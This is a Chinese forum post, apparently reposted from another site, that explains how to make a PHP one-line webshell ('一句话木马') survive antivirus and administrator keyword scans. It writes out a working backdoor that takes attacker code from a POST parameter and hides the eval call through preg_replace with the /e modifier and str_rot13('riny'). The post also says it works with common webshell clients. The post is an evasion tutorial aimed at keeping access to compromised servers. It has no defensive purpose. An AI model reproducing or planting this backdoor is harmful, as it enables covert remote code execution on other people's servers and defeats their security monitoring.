热搜词
发表于 2014-3-27 18:55:34 | 显示全部楼层 |阅读模式
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?
首先我想到的是将eval从字符串类型赋给一个变量。 本文来自http://www.coffnet.com咖啡文学网
如: 牛奶咖啡网www.coffnet.com
$func = 'phpinfo';
$func();
这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想,完全没有eval用着爽,而且也是公开了的,所以我也就将他放弃了。
还记得《20 Ways to Fuzzing PHP Source Code》里提到的preg_replace代码执行漏洞吗?
没错,利用preg_replace的模式修饰符e(PREG_REPLACE_EVAL)就可以将替换后的字符串作为php代码评估运行(eval函数方式)。
既然是将字符串作为php代码评估运行,哪么完全可以替换或者转码一下eval,这样就可以避开关键字了。
我的一句话木马如下:
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
使用上跟原来的一句话没有区别,可用常用的客户端连接密码b4dboy。
str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果。
全部评论0
回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2025-1-10 01:58 , Processed in 0.423764 second(s), 27 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2025 Discuz! Team